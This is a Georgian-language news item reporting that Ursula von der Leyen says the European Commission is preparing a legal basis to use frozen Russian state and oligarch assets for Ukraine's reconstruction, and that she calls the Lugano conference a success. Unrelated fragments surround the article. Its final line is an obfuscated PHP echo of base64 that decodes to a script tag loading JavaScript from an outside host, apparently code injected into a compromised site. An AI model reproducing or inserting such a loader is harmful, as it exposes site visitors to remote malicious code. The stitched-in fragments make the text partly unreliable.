celsiusi
ავერსი შნაიდერი
ევროკომისია ამზადებს სამართლებრივ საფუძველს გაყინული რუსული აქტივების უკრაინის აღდგენისთვის გადასაცემად – უკრაინული მედიის ცნობით, აღნიშნულის შესახებ ევროკომისიის პრეზიდენტმა ურსულა ფონ დერ ლაიენმა განაცხადა.
 
საქმე ეხება ევროკავშირის ტერიტორიაზე, როგორც სახელმწიფო, ისე რუსი ბიზნესმენების გაყინულ აქტივებს.
 
„ჩვენ ვმუშაობთ საკანონმდებლო ბაზაზე, რათა რუსეთის აქტივები და ნაწილობრივ, ოლიგარქების აქტივები გამოიყენონ უკრაინის აღდგენისთვის“, – განაცხადა ურსულა ფონ დერ ლაიენმა.
 
ასევე, ევროკომისიის პრეზიდენტმა უკრაინის აღდგენის შესახებ ლუგანოში გამართულ საერთაშორისო კონფერენციას ძალიან წარმატებული უწოდა, რადგან მან შეძლო მრავალი ინიციატივის გაერთიანება და მათი ძირითადი პრინციპების განხორციელებაზე კონცენტრირება.
 
„უნდა არსებობდეს მართვის სისტემა, რომელიც იქნება კომპეტენტური, ანგარიშვალდებული, სანდო ყველა ინიციატივისთვის, რომელიც მიიღებს დაფინანსებას და უკრაინის აღსადგენად გააერთიანებს ინვესტიციებს რეფორმებთან“, – აღნიშნა ევროკომისიის პრეზიდენტმა.
565
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");